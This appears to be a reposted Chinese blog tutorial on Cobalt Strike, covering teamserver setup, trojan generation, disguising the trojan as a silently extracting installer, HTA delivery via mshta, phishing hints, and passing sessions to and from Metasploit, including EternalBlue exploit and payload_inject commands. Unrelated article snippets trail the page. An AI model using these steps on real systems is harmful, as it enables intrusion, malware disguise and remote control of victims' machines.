CobaltStrike基本渗透

目录

CobaltStrike简介

主要功能:

使用注意:        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

安装

服务端安装

windows安装

CS基本使用

监听器配置

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

​编辑

 木马的伪装(自解压安装包设置)

生成hta文件,靶机上线

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话

设置监听转移,选择外部监听器

结果

msf会话传递至CS上

首先先利用msf上线一台靶机

cs设置监听

msf设置派生

结果


CobaltStrike简介

CobaltStrike(简称CS)是一款专业的团队作战渗透测试工具,包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍:

主要功能:

持久化、横向移动:在已经取得攻击目标控制权后,CobaltStrike能够用于在目标系统中保持长期存在,并进行横向移动,扩大攻击范围。

流量隐藏:通过其独特的技术手段,CobaltStrike可以有效地隐藏网络流量,使攻击行为难以被检测和追踪。

数据窃取:CobaltStrike还具备数据窃取能力,能够从目标系统中提取敏感信息。

使用注意:
        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

在安装CobaltStrike时,设备上需要部署jdk8以上的环境

安装

服务端安装在kali或者云服务器上,客户端安装在Windows上

服务端安装

(下列演示为在kali中安装)

将CobaltStrike安装包中服务端拖进kali中

 在kali桌面文件夹中找到CobaltStrike(以下统称CS)找到teamserver文件,修改文件权限为文件添加执行权限

chmod +x teamserver

执行该文件

./teamserver 本机ip地址 自己设置的密码

 后面会出现如下图所示界面

windows安装

打开CS的客户端,点击如下图框起来的地方

 开始会有如下弹窗

之后会有如下弹窗,下列弹窗中Host填写Server端 IP地址,Port设置为服务端设置端口,Password设置服务端中设置密码,User自己随意设置,然后点击连接

 然后就会出现如下图所示图片

这样就安装成功了

CS基本使用

监听器配置

在CS客户端中点击如下图所示图案

添加会话

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

(木马也可以配合钓鱼攻击生成连接诱导被攻击点击)

选择创建位置

测试是否成功(下列图片测试成功的图片,可以打开机器的文件目录并且对其进行操作)

 木马的伪装(自解压安装包设置)

选择一个木马程序和一个常用的软件,使用winrar软件进行压缩,选择自解压压缩格式选择的这个格式可以让后缀变为exe

点击高级,选择自解压选项

选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic

按照下图设置解压方式

选择解压方式,静默解压

选择更新模式和覆盖模式

设置图标

 

然后点击确定就可以了,然后再修改一下文件名称,他会生成一个如下图所示文件(上面的是正版,下面的是盗版。是不是很像)

上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。

生成hta文件,靶机上线

点击生成hta文件

设置监听和脚本语言

设置监听端口

设置监听端口,和hta文件

设置完成后会给你一串网址

复制地址在靶机上使用mshta进行运行

靶机上线成功

上线之后就可以提权进行下一步渗透了

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话
msf6 > use exploit/multi/handler#下面代码与你在CS中配置有关#payload对应外部监听的payload,lhost配置的是本地地址,lpost要和监听器相同msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) > set lhost 192.168.244.141msf6 exploit(multi/handler) > set lport 8085
设置监听转移,选择外部监听器

结果

会话成功转移到了msf上

msf会话传递至CS上

首先先利用msf上线一台靶机

这里用的是永恒之蓝漏洞上线的一台windows7靶机

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
#设置攻击主机
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.146
#设置监听端口
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
#攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
cs设置监听

msf设置派生

在MSF中,exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下,向该系统的另一个进程注入一个payload。


#使用该模块可以将 Metasploit 获取到的会话注入到CS中
use exploit/windows/local/payload_inject
#和cs监听器保持一致
set payload windows/meterpreter/reverse_http 
#可以不设置,但是端口不要和CS冲突了。
set prependmigrate true   
# msf所在主机IP  
set lhost xxxx 
#CS上的listen端口
set lport XXX  
#要转发的session
set session 2   
run 
结果

会话已被cs获取

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/19982.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

算法(十四)动态规划

算法概念 动态规划(Dynamic Programming)是一种分阶段求解的算法思想,通过拆分问题,定义问题状态和状态之间的关系,使得问题能够以递推(分治)的方式去解决。动态规划中有三个重点概念&#xff…

【监控】prometheus自定义指标 exporter

一、【写在前面】 prometheus自定义指标本质是用代码自己写一个网络访问的采集器,你可以在官网看到,Client libraries | Prometheus官方支持的语言有GO JAVA PYTHON RUBY RUST, 第三方的库就支持的更多了,有BASH C CPP LUA C# JS PHP R PER…

智慧医院物联网建设-统一管理物联网终端及应用

近年来,国家卫健委相继出台的政策和评估标准体系中,都涵盖了强化物联网建设的内容。物联网建设已成为智慧医院建设的核心议题之一。 作为医院高质量发展的关键驱动力,物联网的顶层设计与网络架构设计规划,既需要结合现代信息技术的…

Python3位运算符

前言 本文介绍的是位运算符,位运算可以理解成对二进制数字上的每一个位进行操作的运算,位运算分为 布尔位运算符 和 移位位运算符。 文章目录 前言一、位运算概览1、布尔位运算符1)按位与运算符 ( & )2)按位或运算符 ( | )3…

一款C#开源、简单、免费的屏幕录制和GIF动画制作神器

前言 今天要给大家推荐一款由C#语言开发且开源的操作简单、免费的屏幕录制和GIF动画制作神器:ScreenToGif 。 工具介绍 ScreenToGif 是一款免费的开源屏幕录制和GIF 制作工具。它可以帮助用户捕捉计算机屏幕上的实时动画,并将其保存为高质量的 GIF 图像…

开发者工具-sources(源代码选项)

一、概要说明 源代码面板从视觉效果上分为三个区域:菜单区、内容区、监听区。 菜单区里面有5个子分类: 网页(Page):指页面源,包含了该页面中所有的文件,即使多个域名下的文件也都会展示出来,包括iframe…

手机耳机哪个品牌音质好

在寻找音质出色的手机耳机时,品牌选择显得尤为重要。市场上众多知名品牌提供了各式各样的耳机产品,它们在音质、降噪功能、设计等方面各有千秋。以下是一些在音质上表现优异的手机耳机品牌的分析: 索尼:索尼的耳机以其卓越的降噪技…

开利网络参加广州数据交易所学习活动

开利网络做为南沙广州数据交易所的会员参加了由“广东三会”组织的“数据资产”相关学习活动。(下图为开利董事长付立军先生在签到) 学习内容提现了数字时代企业数字化转型的核之心“发掘数据价值,驱动高速发展”,交易中心组织大家…

5G NR TAE TEST

环境配置: 测试TAE时,需要比对不同的Antenna Port之间的差异来测试 配置DL 2 layer MU的case layer1:通过设置weight,只有一个物理天线上有weight,其他天线上的weight为0,该天线的DMRS DMRS Port设置为1…

学习Java的日子 Day51 数据库,DDL

Day51 MySQL 1.数据库 数据库(database)就是一个存储数据的仓库。为了方便数据的存储和管理,它将数据按照特定的规律存储在磁盘上。通过数据库管理系统,可以有效地组织和管理存储在数据库中的数据 MySQL就是数据库管理系统&#…

PLC无线通讯模块

在工业自动化日益深入的今天,PLC(可编程逻辑控制器)作为工业控制的核心大脑,其功能的扩展和智能化水平直接影响着整个生产线的效率和安全性。而PLC无线通讯模块,作为连接PLC与外界信息世界的桥梁,其重要性不…

Centos给普通用户添加sudo命令权限

打开sudoers文件 sudo visudo 修改sudoers文件 找到root ALL(ALL) ALL这一行,即如下图标出红线的一行 在此行下新增如下内容: lbs为用给予sudo执行权限的用户名 # 执行sudo命令,需要输入命令 lbs ALL(ALL) ALL 或 # 执行sudo命令,…

HQChart使用教程100-uniapp如何在vue3运行微信小程序

HQChart使用教程100-uniapp如何在vue3运行微信小程序 症状原因分析解决思路解决步骤1. 修改vender.js2. 修改HQChartControl.js 完整实例HQChart代码地址 症状 HQChart插件在uniappvue3的项目编译成小程序以后, 运行会报错,见下图。 原因分析 查了下…

【Mac】 Infuse for Mac(多媒体播放器) v7.7.6软件介绍和安装

软件介绍 Infuse Pro是一款非常强大的视频播放器,它被誉为 Apple TV上最强的播放器。它支持广泛的视频格式和解码器,包括DTS、DTS-HD、AC3、E-AC3等高清视频的音频播放任务。此外,Infuse Pro还支持所有常见的高清格式。 Infuse Pro的特点之…

软件行业人均工资多少?20万已完胜大多数

本篇文章继续讨论中国软件行业的人效比。(金融科技公司的人效比链接在这里。) 这次选择了7家公司:软通动力、用友网络、中科软、东软集团、航天信息、东华软件、中国软件,均是中国软件行业排名比较靠前、业务相对纯粹的软件公司。…

如何仿一个抖音极速版领现金的进度条动画?

效果演示 不仅仅是实现效果,要封装,就封装好 看完了演示的效果,你是否在思考,代码应该怎么实现?先不着急写代码,先想想哪些地方是要可以动态配置的。首先第一个,进度条的形状是不是要可以换&am…

力扣257. 二叉树的所有路径

思路&#xff1a;题目需要记录从根节点开始走的路径&#xff0c;无疑选用前序遍历&#xff0c;用一个数组paths 记录走过的节点信息&#xff0c;遇到叶子节点就用另一个list记录下路径&#xff0c;回溯时删掉paths尾节点即可 class Solution {public List<String> binar…

JeecgBoot-Vue3:基于Vue3的低代码开发平台的新篇章

摘要 随着前端技术的不断发展&#xff0c;Vue3.0、TypeScript、Vite以及Ant Design Vue等新技术方案的涌现&#xff0c;为低代码开发平台带来了全新的可能性。JeecgBoot-Vue3作为JeecgBoot低代码平台的全新UI版本&#xff0c;采用Vue3技术栈&#xff0c;结合上述先进技术&#…

VBA代码解决方案第十四讲 如何利用VBA检查单元格中是否含有公式

《VBA代码解决方案》(版权10028096)这套教程是我最早推出的教程&#xff0c;目前已经是第三版修订了。这套教程定位于入门后的提高&#xff0c;在学习这套教程过程中&#xff0c;侧重点是要理解及掌握我的“积木编程”思想。要灵活运用教程中的实例像搭积木一样把自己喜欢的代码…

解决bind error: Address already in use

是端口复用问题 产生原因 程序突然退出系统但是没有释放端口 问题解决 首先通过 //显示进程信息 ps -la //杀死相关进程 kill -9 xxxx然后添加socket设置 int on1; if(setsockopt(lfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on))<0){perror("setsockopt")…